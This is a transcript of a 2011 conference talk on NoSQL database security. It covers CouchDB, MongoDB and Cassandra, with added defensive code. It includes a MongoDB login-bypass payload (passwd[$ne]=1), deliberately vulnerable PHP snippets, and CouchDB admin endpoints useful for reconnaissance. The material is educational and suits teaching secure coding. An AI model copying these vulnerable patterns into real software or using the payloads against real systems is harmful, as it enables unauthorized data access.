Rooted 2011: NoSQL Security (slide transcript)
NoSQL Security
José Ramón Palanco
Wednesday, 16 March 2011
![Page 2: Rooted 2011 nosql security](https://reader031.vdocuments.us/reader031/viewer/2022020207/55500d12b4c90535638b47e2/html5/thumbnails/2.jpg)
Agenda
✦ NoSQL Introduction
✦ NoSQL vs RDBMS
✦ NoSQL Architecture
✦ NoSQL Implementations
✦ Attack vectors
✦ Injections
✦ Key Bruteforce
✦ HTTP Protocol Based Attacks on listeners
✦ Cassandra security and Thrift security
✦ Denial of Service (connection pollution, evil queries)
NoSQL Introduction
What is NoSQL?
✦ In general, they do not need a table schema and do not use "join"
✦ NoSQL solutions do not implement one or more of the ACID properties
CAP Theorem
✦ Properties: consistency, availability and partition tolerance
✦ You have to choose 2 of them
✦ To scale, partitioning is needed
✦ In general, availability is preferred over consistency
NoSQL Architecture: RDBMS vs NoSQL
RDBMS: Client -> HTTP Server -> DB connector (ODBC, ADO, JDBC) -> database, queried with SQL
NoSQL: Client -> HTTP Server (REST, JSON, XML, ...) -> DB connector (Binary, HTTP, ...) -> database
NoSQL vs RDBMS
✦ RDBMS show poor performance and scalability in applications that make heavy use of data
✦ Cloud Computing (SaaS)
✦ Social Networks (SN)
✦ Complex queries cannot be performed with anything other than an RDBMS
Environments
✦ In many environments writes need to be distributed across clusters, MapReduce, ...
✦ Facebook needs to store 135 billion messages each month
✦ Twitter stores 7 TB daily
NoSQL disadvantages
✦ OLTP
✦ SQL
✦ Ad-Hoc queries
✦ Complex relations
NoSQL Architectures
✦ Document store
✦ Graph
✦ Key-value store
✦ Multivalue
✦ Objects
✦ Tabular
Key-value store
✦ CouchDB
✦ MongoDB
✦ Terrastore
✦ ThruDB
✦ OrientDB
✦ RavenDB
Graph
✦ Neo4J
✦ Sones
✦ InfoGrid
✦ HypergraphDB
✦ AllegroGraph
✦ BigData
Key-value
✦ Redis
✦ Riak
✦ Tokyo Cabinet
✦ MemcacheDB
✦ Membase
✦ Azure
Multivalue
✦ U2
✦ OpenInsight
✦ OpenQM
Objects
✦ db4o
✦ Versant
✦ Objectivity
✦ NEO
MongoDB
✦ Protocol: Binary (BSON)
✦ API: several languages
✦ Query: JavaScript/JSON
✦ Language: C++
CouchDB
✦ Protocol: REST
✦ API: JSON
✦ Query: MapReduce (JS)
✦ Language: Erlang
Features
• Schema-Free (JSON)
• Document Oriented, Not Relational
• Highly Concurrent
• RESTful HTTP API
• JavaScript-Powered Map/Reduce
• N-Master Replication
• Robust Storage
{"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/ HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Date: Sat, 19 Feb 2011 05:20:28 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 188
Cache-Control: must-revalidate

{"db_name":"rooted","doc_count":1,"doc_del_count":0,"update_seq":1,"purge_seq":0,"compact_running":false,"disk_size":4182,"instance_start_time":"1298092462502662","disk_format_version":5}
{"couchdb":"Welcome","version":"0.11.0"}
$ telnet 172.16.163.129 5984
Trying 172.16.163.129...
Connected to 172.16.163.129.
Escape character is '^]'.
GET /rooted/f34aae022f67a23ac56dba5b4e000cf2 HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Server: CouchDB/0.11.0 (Erlang OTP/R14B)
Etag: "1-2512702fff02fe841adecde4a22c62b5"
Date: Sat, 19 Feb 2011 05:20:47 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 155
Cache-Control: must-revalidate

{"_id":"f34aae022f67a23ac56dba5b4e000cf2","_rev":"1-2512702fff02fe841adecde4a22c62b5","Nombre":"Jose","DNI":"9393948K","telefono":999999999}
Connection closed by foreign host.
Redis
✦ Protocol: Plain Telnet
✦ API: Several Languages
✦ Query: Commands
✦ Language: C/C++
Cassandra
✦ Protocol: Binary (Thrift)
✦ API: Thrift
✦ Query: Column/ranges
✦ Language: Java
Cassandra
✦ Column (tuple/triplet)
✦ Supercolumn (composed of columns)
✦ Column Family (contains supercolumns)
✦ Keyspace (stores column families)
Cassandra
<Keyspace Name="BloggyAppy">
  <!-- CF definitions -->
  <ColumnFamily CompareWith="BytesType" Name="Authors"/>
  <ColumnFamily CompareWith="BytesType" Name="BlogEntries"/>
  <ColumnFamily CompareWith="TimeUUIDType" Name="TaggedPosts"/>
  <ColumnFamily CompareWith="TimeUUIDType" Name="Comments" CompareSubcolumnsWith="BytesType" ColumnType="Super"/>
</Keyspace>
storage-conf.xml
Attack vectors
Introduction
✦ Several database concepts
✦ Several implementations
✦ So attack vectors are very specific and depend on each implementation
HTTP Based Attacks
✦ Who uses HTTP?
✦ CouchDB
✦ HBASE
✦ Riak
✦ How to locate vulnerabilities?
✦ fuzzing: hzzp
Listener exploitation
✦ As they work over HTTP, misconfigured cache proxies can be used to get access to them
$ telnet server.com 80
Trying X.X.X.X...
Connected to server.com.
Escape character is '^]'
GET /_all_dbs
Host: 192.168.2.18
JSON Injection
db.foo.find( { $or : [ { a : 1 } , { b : 2 } ] } )
db.foo.find( { $or : [ { a : 1 } , { b : 2 }, { c : /.*/ } ] } )
In the same way that SQL input is escaped, we should do the same when working with CouchDB or MongoDB.
Array Injection: MongoDB + PHP
✦ In PHP, a variable can be turned into an array by adding brackets to its name
✦ If the admin password is 'Not Equal' to anything, you can get access
✦ Besides $ne, we can inject:
✦ $or, $exists, $nin, $in, $lt, ... (logical operators)
✦ &var['$regex']=/privileged/i (regex)
<?php
// Vulnerable: both values come straight from the request, so passwd may
// arrive as an array (an operator document) instead of a string.
$collection->find(array(
    "username" => $_GET['username'],
    "passwd"   => $_GET['passwd']
));
?>
/login.php?username=admin&passwd[$ne]=1
<?php
// What the database actually receives for the request above
// ('$ne' in single quotes so PHP does not interpolate a variable).
$collection->find(array(
    "username" => "admin",
    "passwd"   => array('$ne' => 1)
));
?>
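The JSON and array injections above, as an added example that is not from the original slides: it models PHP's bracket-parameter parsing, shows why the naive login filter matches the admin record with a wrong password, and the type check that stops it. All names and the sample record are constructed for this example.

```javascript
// Added example, not from the original slides. Models the PHP behaviour the
// slide describes: "passwd[$ne]=1" in a query string becomes an array, which a
// naive find() then hands to MongoDB as an operator. All names are constructed.

// One level of PHP-style bracket parsing: "passwd[$ne]=1" -> { passwd: { $ne: "1" } }
function parsePhpStyleQuery(qs) {
  const params = {};
  for (const pair of qs.split("&")) {
    const [rawKey, rawVal = ""] = pair.split("=");
    const key = decodeURIComponent(rawKey);
    const val = decodeURIComponent(rawVal);
    const m = key.match(/^([^\[]+)\[([^\]]*)\]$/);
    if (m) {
      params[m[1]] = params[m[1]] || {};
      params[m[1]][m[2]] = val;
    } else {
      params[key] = val;
    }
  }
  return params;
}

// Vulnerable: copies whatever the client sent, arrays/objects included.
function naiveLoginFilter(p) {
  return { username: p.username, passwd: p.passwd };
}

// Hardened: credentials must be plain strings, so an operator object
// such as { "$ne": "1" } is rejected before it reaches the database.
function safeLoginFilter(p) {
  for (const f of ["username", "passwd"]) {
    if (typeof p[f] !== "string") throw new TypeError(`${f} must be a string`);
  }
  return { username: p.username, passwd: p.passwd };
}

// Minimal stand-in for MongoDB's equality and $ne matching on one document,
// enough to show why the injected filter matches the admin record.
function docMatches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      if ("$ne" in cond) return doc[field] !== cond.$ne;
      return false; // other operators are not modelled here
    }
    return doc[field] === cond;
  });
}

const adminDoc = { username: "admin", passwd: "s3cret" }; // constructed sample record
```

With the injected request the naive filter matches the admin record although no password was supplied; the hardened builder refuses the request before any query is sent.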
View Injection
✦ CouchDB uses SpiderMonkey as scripting engine
✦ The views are loaded as js
$ ldd /usr/lib/couchdb/bin/couchjs
    libcurl.so.4 => /usr/lib/libcurl.so.4 (0x00007f7124325000)
    libmozjs.so.2d => /usr/lib/libmozjs.so.2d (0x00007f7124063000)
    ...
View Injection
✦ There are predefined and temporary views
✦ They are used to perform MapReduce
✦ Get arbitrary data, or change values to alter the execution flow
REST Injection
✦ Cross Database:
✦ /?db=_all_dbs
✦ /?db=myusers
<?php
// Vulnerable: database name and document id are concatenated into the
// request path without any validation.
$dbname = $_GET["db"];
$doc_id = $_GET["d_id"];
$resp = $couch->send("GET", "/" . $dbname . "/" . $doc_id);
?>
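The check the wrapper above is missing, as an added example that is not from the original slides: a path builder that validates the database name, pins it to an allowlist and encodes the document id, so db=_all_dbs or db=myusers cannot redirect the request. The function name, the allowlist and the sample ids are assumptions of this example.

```javascript
// Added example, not from the original slides: the check a CouchDB client
// wrapper should apply before building "/" . $dbname . "/" . $doc_id from
// request parameters. Names and the allowlist are assumptions of this example.

// CouchDB database names: lowercase letters, digits and _$()+- , starting with
// a letter. "/" (legal in CouchDB when percent-encoded) is excluded on purpose.
const DB_NAME_RE = /^[a-z][a-z0-9_$()+-]*$/;

function buildDocPath(db, docId, allowedDbs) {
  if (typeof db !== "string" || typeof docId !== "string") {
    throw new TypeError("db and docId must be strings");
  }
  if (!DB_NAME_RE.test(db)) throw new Error(`invalid database name: ${db}`);
  // Pin the request to databases this application owns; a syntactically
  // valid name such as "myusers" is still refused if it is not ours.
  if (!allowedDbs.includes(db)) throw new Error(`database not allowed: ${db}`);
  // Reserved endpoints start with "_" (_all_dbs, _config, _all_docs, ...);
  // an application document id must never point at one of them.
  if (docId.startsWith("_")) throw new Error(`reserved document id: ${docId}`);
  // Encode the id so "/" or "?" inside it cannot add path segments or query args.
  return `/${db}/${encodeURIComponent(docId)}`;
}
```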
CouchDB info
✦ http://172.16.163.129:5984/_config
✦ http://172.16.163.129:5984/_all_dbs
✦ http://172.16.163.129:5984/_stats
✦ http://172.16.163.129:5984/_utils
CouchDB cmd exec.
GQL Injection
✦ GQL injection is possible, but only in a very controlled environment
✦ There is no negation operator "!"
✦ The set of GQL commands is very limited
Key Bruteforce
✦ As there are no schemas, we do not have to discover them
✦ The IDs are large, but not generated at random:
e479f720ff9a05fb2f441fef97000c87
e479f720ff9a05fb2f441fef97000b61
Cassandra Security
✦ If we change the name of a column family, we can get items from another family
<?php
...
$columnParent = new cassandra_ColumnParent();
$columnParent->super_column = NULL;
// Vulnerable: the column family name is built from the request parameter
// without validation, so the caller chooses which family is read.
if (isset($_GET['CF']))
    $columnParent->column_family = $_GET['CF'] . "_myfam";
$sliceRange = new cassandra_SliceRange();
$sliceRange->start = "";
$sliceRange->finish = "";
$predicate = new cassandra_SlicePredicate();
$predicate->slice_range = $sliceRange;
$consistency_level = cassandra_ConsistencyLevel::ONE;
$keyUserId = 1;
$result = $client->get_slice($keyspace, $keyUserId, $columnParent, $predicate, $consistency_level);
print_r($result);
...
?>
Denial of Service
✦ Connection pollution
✦ CouchDB: the interface is implemented as RESTful
✦ With GQL, it is possible to perform a DoS by creating queries that make intensive use of CPU; the account will be disconnected or billed for that extra CPU
Questions